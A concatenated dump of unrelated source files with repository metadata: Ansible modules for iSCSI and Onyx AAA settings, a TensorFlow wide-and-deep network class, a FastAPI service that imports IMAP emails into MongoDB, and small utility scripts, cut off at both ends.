aliases: [ automatic ] discover: description: - Whether the list of target nodes on the portal should be (re)discovered and added to the persistent iSCSI database. - Keep in mind that C(iscsiadm) discovery resets configuration, like C(node.startup) to manual, hence combined with C(auto_node_startup=yes) will always return a changed state. type: bool show_nodes: description: - Whether the list of nodes in the persistent iSCSI database should be returned by the module. 
type: bool ''' EXAMPLES = r''' - name: Perform a discovery on 10.1.2.3 and show available target nodes open_iscsi: show_nodes: yes discover: yes portal: 10.1.2.3 # NOTE: Only works if exactly one target is exported to the initiator - name: Discover targets on portal and login to the one available open_iscsi: portal: '{{ iscsi_target }}' login: yes discover: yes - name: Connect to the named target, after updating the local persistent database (cache) open_iscsi: login: yes target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d - name: Disconnect from the cached named target open_iscsi: login: no target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d ''' import glob import os import time from ansible.module_utils.basic import AnsibleModule ISCSIADM = 'iscsiadm' def compare_nodelists(l1, l2): l1.sort() l2.sort() return l1 == l2 def iscsi_get_cached_nodes(module, portal=None): cmd = '%s --mode node' % iscsiadm_cmd (rc, out, err) = module.run_command(cmd) if rc == 0: lines = out.splitlines() nodes = [] for line in lines: # line format is "ip:port,target_portal_group_tag targetname" parts = line.split() if len(parts) > 2: module.fail_json(msg='error parsing output', cmd=cmd) target = parts[1] parts = parts[0].split(':') target_portal = parts[0] if portal is None or portal == target_portal: nodes.append(target) # older versions of scsiadm don't have nice return codes # for newer versions see iscsiadm(8); also usr/iscsiadm.c for details # err can contain [N|n]o records... 
elif rc == 21 or (rc == 255 and "o records found" in err): nodes = [] else: module.fail_json(cmd=cmd, rc=rc, msg=err) return nodes def iscsi_discover(module, portal, port): cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (iscsiadm_cmd, portal, port) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_loggedon(module, target): cmd = '%s --mode session' % iscsiadm_cmd (rc, out, err) = module.run_command(cmd) if rc == 0: return target in out elif rc == 21: return False else: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_login(module, target, portal=None, port=None): node_auth = module.params['node_auth'] node_user = module.params['node_user'] node_pass = module.params['node_pass'] if node_user: params = [('node.session.auth.authmethod', node_auth), ('node.session.auth.username', node_user), ('node.session.auth.password', node_pass)] for (name, value) in params: cmd = '%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target) if portal is not None and port is not None: cmd += ' --portal %s:%s' % (portal, port) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_logout(module, target): cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_device_node(module, target): # if anyone know a better way to find out which devicenodes get created for # a given target... devices = glob.glob('/dev/disk/by-path/*%s*' % target) devdisks = [] for dev in devices: # exclude partitions if "-part" not in dev: devdisk = os.path.realpath(dev) # only add once (multi-path?) 
if devdisk not in devdisks: devdisks.append(devdisk) return devdisks def target_isauto(module, target): cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc == 0: lines = out.splitlines() for line in lines: if 'node.startup' in line: return 'automatic' in line return False else: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_setauto(module, target): cmd = '%s --mode node --targetname %s --op=update --name node.startup --value automatic' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_setmanual(module, target): cmd = '%s --mode node --targetname %s --op=update --name node.startup --value manual' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def main(): # load ansible module object module = AnsibleModule( argument_spec=dict( # target portal=dict(type='str', aliases=['ip']), port=dict(type='str', default='3260'), target=dict(type='str', aliases=['name', 'targetname']), node_auth=dict(type='str', default='CHAP'), node_user=dict(type='str'), node_pass=dict(type='str', no_log=True), # actions login=dict(type='bool', aliases=['state']), auto_node_startup=dict(type='bool', aliases=['automatic']), discover=dict(type='bool', default=False), show_nodes=dict(type='bool', default=False), ), required_together=[['discover_user', 'discover_pass'], ['node_user', 'node_pass']], supports_check_mode=True, ) global iscsiadm_cmd iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True) # parameters portal = module.params['portal'] target = module.params['target'] port = module.params['port'] login = module.params['login'] automatic = module.params['auto_node_startup'] discover = module.params['discover'] show_nodes = module.params['show_nodes'] check = module.check_mode cached = iscsi_get_cached_nodes(module, portal) # return json dict result = {} result['changed'] = 
False if discover: if portal is None: module.fail_json(msg="Need to specify at least the portal (ip) to discover") elif check: nodes = cached else: iscsi_discover(module, portal, port) nodes = iscsi_get_cached_nodes(module, portal) if not compare_nodelists(cached, nodes): result['changed'] |= True result['cache_updated'] = True else: nodes = cached if login is not None or automatic is not None: if target is None: if len(nodes) > 1: module.fail_json(msg="Need to specify a target") else: target = nodes[0] else: # check given target is in cache check_target = False for node in nodes: if node == target: check_target = True break if not check_target: module.fail_json(msg="Specified target not found") if show_nodes: result['nodes'] = nodes if login is not None: loggedon = target_loggedon(module, target) if (login and loggedon) or (not login and not loggedon): result['changed'] |= False if login: result['devicenodes'] = target_device_node(module, target) elif not check: if login: target_login(module, target, portal, port) # give udev some time time.sleep(1) result['devicenodes'] = target_device_node(module, target) else: target_logout(module, target) result['changed'] |= True result['connection_changed'] = True else: result['changed'] |= True result['connection_changed'] = True if automatic is not None: isauto = target_isauto(module, target) if (automatic and isauto) or (not automatic and not isauto): result['changed'] |= False result['automatic_changed'] = False elif not check: if automatic: target_setauto(module, target) else: target_setmanual(module, target) result['changed'] |= True result['automatic_changed'] = True else: result['changed'] |= True result['automatic_changed'] = True module.exit_json(**result) if __name__ == '__main__': main()
31.128415
121
0.598174
4306437305398fdfa56682cb39fae32e02b7acb6
15,271
py
Python
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
1,107
2016-09-21T02:18:36.000Z
2022-03-29T02:52:12.000Z
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
18
2016-12-22T10:24:47.000Z
2022-03-11T23:18:43.000Z
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
776
2016-12-21T12:08:08.000Z
2022-03-21T06:12:08.000Z
import os import sys root_path = os.path.abspath("../../../") if root_path not in sys.path: sys.path.append(root_path) import math import numpy as np import tensorflow as tf from _Dist.NeuralNetworks.NNUtil import * from _Dist.NeuralNetworks.c_BasicNN.DistNN import Basic class Advanced(Basic): signature = "Advanced" def __init__(self, name=None, data_info=None, model_param_settings=None, model_structure_settings=None): self.tf_list_collections = None super(Advanced, self).__init__(name, model_param_settings, model_structure_settings) self._name_appendix = "Advanced" if data_info is None: self.data_info = {} else: assert_msg = "data_info should be a dictionary" assert isinstance(data_info, dict), assert_msg self.data_info = data_info self._data_info_initialized = False self.numerical_idx = self.categorical_columns = None self._deep_input = self._wide_input = None self._categorical_xs = None self.embedding_size = None self._embedding = self._one_hot = self._embedding_concat = self._one_hot_concat = None self._embedding_with_one_hot = self._embedding_with_one_hot_concat = None self.dropout_keep_prob = self.use_batch_norm = None self._use_wide_network = self._dndf = self._pruner = self._dndf_pruner = None self._tf_p_keep = None self._n_batch_placeholder = None @property def valid_numerical_idx(self): return np.array([ is_numerical for is_numerical in self.numerical_idx if is_numerical is not None ]) def init_data_info(self): if self._data_info_initialized: return self._data_info_initialized = True self.numerical_idx = self.data_info.get("numerical_idx", None) self.categorical_columns = self.data_info.get("categorical_columns", None) if self.numerical_idx is None: raise ValueError("numerical_idx should be provided") if self.categorical_columns is None: raise ValueError("categorical_columns should be provided") def init_from_data(self, x, y, x_test, y_test, sample_weights, names): self.init_data_info() super(Advanced, self).init_from_data(x, y, x_test, y_test, 
sample_weights, names) if len(self.valid_numerical_idx) != self.n_dim + 1: raise ValueError("Length of valid_numerical_idx should be {}, {} found".format( self.n_dim + 1, len(self.valid_numerical_idx) )) self.n_dim -= len(self.categorical_columns) self.model_structure_settings.setdefault("use_wide_network", self.n_dim > 0) def init_model_param_settings(self): super(Advanced, self).init_model_param_settings() self.dropout_keep_prob = float(self.model_param_settings.get("keep_prob", 0.5)) self.use_batch_norm = self.model_param_settings.get("use_batch_norm", False) def init_model_structure_settings(self): self.hidden_units = self.model_structure_settings.get("hidden_units", None) self._deep_input = self.model_structure_settings.get("deep_input", "embedding_concat") self._wide_input = self.model_structure_settings.get("wide_input", "continuous") self.embedding_size = self.model_structure_settings.get("embedding_size", 8) self._use_wide_network = self.model_structure_settings["use_wide_network"] if not self._use_wide_network: self._dndf = None else: dndf_params = self.model_structure_settings.get("dndf_params", {}) if self.model_structure_settings.get("use_dndf", True): self._dndf = DNDF(self.n_class, **dndf_params) if self.model_structure_settings.get("use_pruner", True): pruner_params = self.model_structure_settings.get("pruner_params", {}) self._pruner = Pruner(**pruner_params) if self.model_structure_settings.get("use_dndf_pruner", False): dndf_pruner_params = self.model_structure_settings.get("dndf_pruner_params", {}) self._dndf_pruner = Pruner(**dndf_pruner_params) def _get_embedding(self, i, n): embedding_size = math.ceil(math.log2(n)) + 1 if self.embedding_size == "log" else self.embedding_size embedding = tf.Variable(tf.truncated_normal( [n, embedding_size], mean=0, stddev=0.02 ), name="Embedding{}".format(i)) return tf.nn.embedding_lookup(embedding, self._categorical_xs[i], name="Embedded_X{}".format(i)) def _define_hidden_units(self): n_data = 
len(self._train_generator) current_units = self._deep_input.shape[1].value if current_units > 512: self.hidden_units = [1024, 1024] elif current_units > 256: if n_data >= 10000: self.hidden_units = [1024, 1024] else: self.hidden_units = [2 * current_units, 2 * current_units] else: if n_data >= 100000: self.hidden_units = [768, 768] elif n_data >= 10000: self.hidden_units = [512, 512] else: self.hidden_units = [2 * current_units, 2 * current_units] def _fully_connected_linear(self, net, shape, appendix): with tf.name_scope("Linear{}".format(appendix)): w = init_w(shape, "W{}".format(appendix)) if self._pruner is not None: w = self._pruner.prune_w(*self._pruner.get_w_info(w)) b = init_b([shape[1]], "b{}".format(appendix)) self._ws.append(w) self._bs.append(b) return tf.add(tf.matmul(net, w), b, name="Linear{}_Output".format(appendix)) def _build_layer(self, i, net): if self.use_batch_norm: net = tf.layers.batch_normalization(net, training=self._is_training, name="BN{}".format(i)) activation = self.activations[i] if activation is not None: net = getattr(Activations, activation)(net, "{}{}".format(activation, i)) if self.dropout_keep_prob < 1: net = tf.nn.dropout(net, keep_prob=self._tf_p_keep) return net def _build_model(self, net=None): super(Advanced, self)._build_model(self._deep_input) if self._use_wide_network: if self._dndf is None: wide_output = self._fully_connected_linear( self._wide_input, appendix="_wide_output", shape=[self._wide_input.shape[1].value, self.n_class] ) else: wide_output = self._dndf( self._wide_input, self._n_batch_placeholder, pruner=self._dndf_pruner ) self._output += wide_output def _get_feed_dict(self, x, y=None, weights=None, is_training=True): continuous_x = x[..., self.valid_numerical_idx[:-1]] if self._categorical_xs else x feed_dict = super(Advanced, self)._get_feed_dict(continuous_x, y, weights, is_training) if self._dndf is not None: feed_dict[self._n_batch_placeholder] = len(x) if self._pruner is not None: cond_placeholder = 
self._pruner.cond_placeholder if cond_placeholder is not None: feed_dict[cond_placeholder] = True if self._dndf is not None and self._dndf_pruner is not None: cond_placeholder = self._dndf_pruner.cond_placeholder if cond_placeholder is not None: feed_dict[cond_placeholder] = True for (idx, _), categorical_x in zip(self.categorical_columns, self._categorical_xs): feed_dict.update({categorical_x: x[..., idx].astype(np.int32)}) return feed_dict def _define_input_and_placeholder(self): super(Advanced, self)._define_input_and_placeholder() if not self.categorical_columns: self._categorical_xs = [] self._one_hot = self._one_hot_concat = self._tfx self._embedding = self._embedding_concat = self._tfx self._embedding_with_one_hot = self._embedding_with_one_hot_concat = self._tfx else: all_categorical = self.n_dim == 0 with tf.name_scope("Categorical_Xs"): self._categorical_xs = [ tf.placeholder(tf.int32, shape=[None], name="Categorical_X{}".format(i)) for i in range(len(self.categorical_columns)) ] with tf.name_scope("One_hot"): one_hot_vars = [ tf.one_hot(self._categorical_xs[i], n) for i, (_, n) in enumerate(self.categorical_columns) ] self._one_hot = self._one_hot_concat = tf.concat(one_hot_vars, 1, name="Raw") if not all_categorical: self._one_hot_concat = tf.concat([self._tfx, self._one_hot], 1, name="Concat") with tf.name_scope("Embedding"): embeddings = [ self._get_embedding(i, n) for i, (_, n) in enumerate(self.categorical_columns) ] self._embedding = self._embedding_concat = tf.concat(embeddings, 1, name="Raw") if not all_categorical: self._embedding_concat = tf.concat([self._tfx, self._embedding], 1, name="Concat") with tf.name_scope("Embedding_with_one_hot"): self._embedding_with_one_hot = self._embedding_with_one_hot_concat = tf.concat( embeddings + one_hot_vars, 1, name="Raw" ) if not all_categorical: self._embedding_with_one_hot_concat = tf.concat( [self._tfx, self._embedding_with_one_hot], 1, name="Concat" ) if self._wide_input == "continuous": 
self._wide_input = self._tfx else: self._wide_input = getattr(self, "_" + self._wide_input) if self._deep_input == "continuous": self._deep_input = self._tfx else: self._deep_input = getattr(self, "_" + self._deep_input) if self.hidden_units is None: self._define_hidden_units() self._tf_p_keep = tf.cond( self._is_training, lambda: self.dropout_keep_prob, lambda: 1., name="keep_prob" ) self._n_batch_placeholder = tf.placeholder(tf.int32, name="n_batch") def _define_py_collections(self): super(Advanced, self)._define_py_collections() self.py_collections += ["data_info", "numerical_idx", "categorical_columns"] def _define_tf_collections(self): super(Advanced, self)._define_tf_collections() self.tf_collections += [ "_deep_input", "_wide_input", "_n_batch_placeholder", "_embedding", "_one_hot", "_embedding_with_one_hot", "_embedding_concat", "_one_hot_concat", "_embedding_with_one_hot_concat" ] self.tf_list_collections = ["_categorical_xs"] def add_tf_collections(self): super(Advanced, self).add_tf_collections() for tf_list in self.tf_list_collections: target_list = getattr(self, tf_list) if target_list is None: continue for tensor in target_list: tf.add_to_collection(tf_list, tensor) def restore_collections(self, folder): for tf_list in self.tf_list_collections: if tf_list is not None: setattr(self, tf_list, tf.get_collection(tf_list)) super(Advanced, self).restore_collections(folder) def clear_tf_collections(self): super(Advanced, self).clear_tf_collections() for key in self.tf_list_collections: tf.get_collection_ref(key).clear() def print_settings(self, only_return=False): msg = "\n".join([ "=" * 100, "This is a {}".format( "{}-classes problem".format(self.n_class) if not self.n_class == 1 else "regression problem" ), "-" * 100, "Data : {} training samples, {} test samples".format( len(self._train_generator), len(self._test_generator) if self._test_generator is not None else 0 ), "Features : {} categorical, {} numerical".format( len(self.categorical_columns), 
np.sum(self.valid_numerical_idx) ) ]) + "\n" msg += "=" * 100 + "\n" msg += "Deep model: DNN\n" msg += "Deep model input: {}\n".format( "Continuous features only" if not self.categorical_columns else "Continuous features with embeddings" if np.any(self.numerical_idx) else "Embeddings only" ) msg += "-" * 100 + "\n" if self.categorical_columns: msg += "Embedding size: {}\n".format(self.embedding_size) msg += "Actual feature dimension: {}\n".format(self._embedding_concat.shape[1].value) msg += "-" * 100 + "\n" if self.dropout_keep_prob < 1: msg += "Using dropout with keep_prob = {}\n".format(self.dropout_keep_prob) else: msg += "Training without dropout\n" msg += "Training {} batch norm\n".format("with" if self.use_batch_norm else "without") msg += "Hidden units: {}\n".format(self.hidden_units) msg += "=" * 100 + "\n" if not self._use_wide_network: msg += "Wide model: None\n" else: msg += "Wide model: {}\n".format("logistic regression" if self._dndf is None else "DNDF") msg += "Wide model input: Continuous features only\n" msg += "-" * 100 + '\n' if self._dndf is not None: msg += "Using DNDF with n_tree = {}, tree_depth = {}\n".format( self._dndf.n_tree, self._dndf.tree_depth ) msg += "\n".join(["=" * 100, "Hyper parameters", "-" * 100, "{}".format( "This is a DNN model" if self._dndf is None and not self._use_wide_network else "This is a Wide & Deep model" if self._dndf is None else "This is a hybrid model" ), "-" * 100]) + "\n" msg += "Activation : " + str(self.activations) + "\n" msg += "Batch size : " + str(self.batch_size) + "\n" msg += "Epoch num : " + str(self.n_epoch) + "\n" msg += "Optimizer : " + self._optimizer_name + "\n" msg += "Metric : " + self._metric_name + "\n" msg += "Loss : " + self._loss_name + "\n" msg += "lr : " + str(self.lr) + "\n" msg += "-" * 100 + "\n" msg += "Pruner : {}".format("None" if self._pruner is None else "") + "\n" if self._pruner is not None: msg += "\n".join("-> {:14}: {}".format(key, value) for key, value in sorted( 
self._pruner.params.items() )) + "\n" msg += "-" * 100 return msg if only_return else self.log_msg( "\n" + msg, logger=self.get_logger("print_settings", "general.log"))
46.700306
112
0.603431
60cc8fde5298eb8b2ba7eb219e5f4d8541b683fd
4,515
py
Python
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
1
2021-12-06T20:29:28.000Z
2021-12-06T20:29:28.000Z
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
null
null
null
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
null
null
null
import os
from imap_tools import MailBox, AND
import pymongo
from pydantic import BaseModel
from fastapi import FastAPI
from bs4 import BeautifulSoup
import uvicorn

app = FastAPI()

# Check if rest api is running.
print("Rest-Server running")


# Request model carrying IMAP + MongoDB connection settings.
# NOTE(review): the defaults are read from the environment once, at
# class-definition time — not per request. Confirm this is intended.
class ImportEmails(BaseModel):
    imap_username: str = os.environ.get('IMAP_PALIDO_USERNAME')
    imap_password: str = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')
    imap_server_url: str = os.environ.get('IMAP_PALIDO_SERVER')
    mongodb_connection_string: str = os.environ.get('ME_CONFIG_MONGODB_URL')
    collection_name: str = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')


def scrape_emails(ImportEmails):
    """Fetch every message from the configured IMAP inbox and store it in MongoDB.

    Skips the import entirely if the target collection already holds more
    than one document (treated as "already imported").

    NOTE(review): the parameter name shadows the ImportEmails class, and every
    field is immediately overwritten from the environment below, so whatever
    the caller passes in is ignored — confirm this is intended.
    """
    # Overwrite all connection settings from the environment.
    ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')
    ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')
    ImportEmails.mongodb_connection_string = os.environ.get('ME_CONFIG_MONGODB_URL')
    ImportEmails.collection_name = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')
    ImportEmails.imap_server_url = os.environ.get('IMAP_PALIDO_SERVER')
    # connect to mongodb
    # if ImportEmails.imap_username == "username" then use os.environ.get('IMAP_PALIDO_USERNAME')
    # if ImportEmails.imap_password == "password" then use os.environ.get('IMAP_PALIDO_PASSWORD')
    # if(ImportEmails.imap_username == "username"):
    #     ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')
    # if(ImportEmails.imap_password == "password"):
    #     ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_PASSWORD')
    myclient = pymongo.MongoClient(ImportEmails.mongodb_connection_string)
    # NOTE(review): MongoClient connects lazily — this truthiness check does
    # not actually verify the server is reachable.
    if myclient:
        print("MongoDB is connected")
        print("Connected with: " + str(ImportEmails.mongodb_connection_string))
    mydb = myclient["Cellarius"]
    print("Connected to MongoDB")
    # Create/open the collection.
    # TODO: the collection name is always "None"; it should be the value of
    # the ImportEmails.collection_name var (hard-coded below as a workaround).
    col = "imported_emails"
    collection = mydb[col]
    print("Open collection :" + collection.name)
    # If the collection already has documents, stop: import was done before.
    print(collection.count_documents({}))
    if collection.count_documents({}) > 1:
        print("Collection has more then one document")
        return
    print("Collection created:" + collection.name)
    # Log in to the IMAP server and walk the whole INBOX.
    mailbox = MailBox(str(ImportEmails.imap_server_url))
    mailbox.login(str(ImportEmails.imap_username), str(ImportEmails.imap_password), initial_folder='INBOX')
    c = 0  # running count of saved messages, for logging only
    for msg in mailbox.fetch(AND(all=True)):
        # Strip the HTML and split the thread into individual mails on the
        # German "Von:" ("From:") marker.
        soup = BeautifulSoup(msg.html, 'html.parser')
        email_texts = soup.get_text().split('Von:')
        email_texts_parsed = []
        for e in email_texts:
            # Drop empty lines and re-join each part into one string.
            text = (''.join(list(filter(None, e.split('\n')))))
            email_texts_parsed.append(text)
        email_conversation = {
            "uid": msg.uid,
            "subject": msg.subject,
            "from": msg.from_,
            "to": msg.to,
            "html": msg.html,
            "email_texts": email_texts_parsed,
            "data_status": 0
        }
        c = c + 1
        x = collection.insert_one(email_conversation)
        print("Saved:", c, msg.uid, msg.subject)
    mailbox.logout()
    print("Finished scraping emails")


# run ImportEmails scrape_emails
# scrape_emails(ImportEmails)

# Create a POST endpoint that triggers the import.
@app.post("/start-import-emails")
async def import_emails(input: ImportEmails):
    # NOTE(review): this passes the ImportEmails CLASS, not the parsed
    # `input` instance — the request body is effectively ignored (harmless
    # today only because scrape_emails re-reads the environment anyway).
    scrape_emails(ImportEmails)
    return "OK"


@app.get("/")
async def root():
    return {"message": "Hello World"}


# uvicorn.run(app, host="0.0.0.0", port=8000)
uvicorn.run(app, host="0.0.0.0", port=8000, root_path="/cellarius/import-emails")
36.41129
118
0.66711
71e1fc0892b74520084fc5cc7410f69346dd3218
479
py
Python
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
from pathlib import Path


# Count the number of directories inside a directory (incl. subdirectories).
def count_dirs(path):
    """Recursively count directories under ``path``, including ``path`` itself.

    A directory whose children cannot be listed (``PermissionError``) is
    counted as a single directory, since its contents are unknown.

    :param path: ``pathlib.Path`` of the directory to scan
    :return: number of directories, always >= 1
    """
    try:
        subdirs = [entry for entry in path.iterdir() if entry.is_dir()]
    except PermissionError:
        # Cannot enumerate children; count only the directory itself.
        return 1
    return 1 + sum(count_dirs(subdir) for subdir in subdirs)


if __name__ == "__main__":
    # Fixes: raw string — "\S" was an invalid escape sequence (deprecated
    # since Python 3.6); and the __main__ guard makes the module importable
    # on machines where O:\ does not exist (the bare call crashed at import
    # with FileNotFoundError, which the function deliberately does not catch).
    count = count_dirs(Path(r"O:\Spielwiese"))
    print(count)
25.210526
108
0.643006
46080f0351429e6f033ebda794d228d6c1c01157
5,905
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # # Copyright: Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: onyx_aaa author: "Sara Touqan (@sarato)" short_description: Configures AAA parameters description: - This module provides declarative management of AAA protocol params on Mellanox ONYX network devices. options: tacacs_accounting_enabled: description: - Configures accounting settings. type: bool auth_default_user: description: - Sets local user default mapping. type: str choices: ['admin', 'monitor'] auth_order: description: - Sets the order on how to handle remote to local user mappings. type: str choices: ['local-only', 'remote-first', 'remote-only'] auth_fallback_enabled: description: - Enables/Disables fallback server-err option. type: bool ''' EXAMPLES = """ - name: configures aaa onyx_aaa: tacacs_accounting_enabled: yes auth_default_user: monitor auth_order: local-only auth_fallback_enabled: false """ RETURN = """ commands: description: The list of configuration mode commands to send to the device. 
returned: always type: list sample: - aaa accounting changes default stop-only tacacs+ - no aaa accounting changes default stop-only tacacs+ - aaa authorization map default-user <user> - aaa authorization map order <order> - aaa authorization map fallback server-err - no aaa authorization map fallback server-err """ import re from ansible.module_utils.basic import AnsibleModule from ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import show_cmd from ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import BaseOnyxModule class OnyxAAAModule(BaseOnyxModule): def init_module(self): """ initialize module """ element_spec = dict( tacacs_accounting_enabled=dict(type='bool'), auth_default_user=dict(type='str', choices=['admin', 'monitor']), auth_order=dict(type='str', choices=['local-only', 'remote-first', 'remote-only']), auth_fallback_enabled=dict(type='bool') ) argument_spec = dict() argument_spec.update(element_spec) self._module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True) def get_required_config(self): module_params = self._module.params self._required_config = dict(module_params) self.validate_param_values(self._required_config) def _set_aaa_config(self, all_aaa_config): aaa_config = all_aaa_config[0] self._current_config['auth_default_user'] = aaa_config.get("Default User") self._current_config['auth_order'] = aaa_config.get("Map Order") auth_fallback_enabled = aaa_config.get("Fallback on server-err") if auth_fallback_enabled == "yes": self._current_config['auth_fallback_enabled'] = True else: self._current_config['auth_fallback_enabled'] = False aaa_config_2 = all_aaa_config[2] accounting_message = aaa_config_2.get("message") if accounting_message == "No accounting methods configured.": self._current_config['tacacs_accounting_enabled'] = False else: self._current_config['tacacs_accounting_enabled'] = True def _show_aaa_config(self): cmd = "show aaa" return show_cmd(self._module, 
cmd, json_fmt=True, fail_on_error=False) def load_current_config(self): self._current_config = dict() aaa_config = self._show_aaa_config() if aaa_config: self._set_aaa_config(aaa_config) def generate_commands(self): tacacs_accounting_enabled = self._required_config.get("tacacs_accounting_enabled") if tacacs_accounting_enabled is not None: current_accounting_enabled = self._current_config.get("tacacs_accounting_enabled") if current_accounting_enabled != tacacs_accounting_enabled: if tacacs_accounting_enabled is True: self._commands.append('aaa accounting changes default stop-only tacacs+') else: self._commands.append('no aaa accounting changes default stop-only tacacs+') auth_default_user = self._required_config.get("auth_default_user") if auth_default_user is not None: current_user = self._current_config.get("auth_default_user") if current_user != auth_default_user: self._commands.append('aaa authorization map default-user {0}' .format(auth_default_user)) auth_order = self._required_config.get("auth_order") if auth_order is not None: current_order = self._current_config.get("auth_order") if current_order != auth_order: self._commands.append('aaa authorization map order {0}' .format(auth_order)) auth_fallback_enabled = self._required_config.get("auth_fallback_enabled") if auth_fallback_enabled is not None: current_fallback = self._current_config.get("auth_fallback_enabled") if current_fallback != auth_fallback_enabled: if auth_fallback_enabled is True: self._commands.append('aaa authorization map fallback server-err') else: self._commands.append('no aaa authorization map fallback server-err') def main(): """ main entry point for module execution """ OnyxAAAModule.main() if __name__ == '__main__': main()
36.677019
106
0.682642
e804af1034061f2f104d2ffe58eec14a7bc29868
88
py
Python
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 26/26.py
jaswinder9051998/Resources
fd468af37bf24ca57555d153ee64693c018e822e
[ "MIT" ]
101
2021-12-20T11:57:11.000Z
2022-03-23T09:49:13.000Z
50-Python-Exercises/Exercises/Exercise 26/26.py
kuwarkapur/Hacktoberfest-2022
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
[ "MIT" ]
4
2022-01-12T11:55:56.000Z
2022-02-12T04:53:33.000Z
50-Python-Exercises/Exercises/Exercise 26/26.py
kuwarkapur/Hacktoberfest-2022
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
[ "MIT" ]
38
2022-01-12T11:56:16.000Z
2022-03-23T10:07:52.000Z
# Make a script that prints out numbers from 1 to 10, one per line.
print("\n".join(str(number) for number in range(1, 11)))
17.6
51
0.681818
e826dce0a2efec3777ab49d67c529dd9c42675ca
2,811
py
Python
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
from typing import List, Optional

from watchmen_data_kernel.storage import TopicDataEntityHelper
from watchmen_data_kernel.topic_schema import TopicSchema
from watchmen_model.admin import Topic
from watchmen_model.common import TenantId, TopicId

from .cache_manager import get_topic_by_id_cache, get_topic_by_tenant_and_name_cache, \
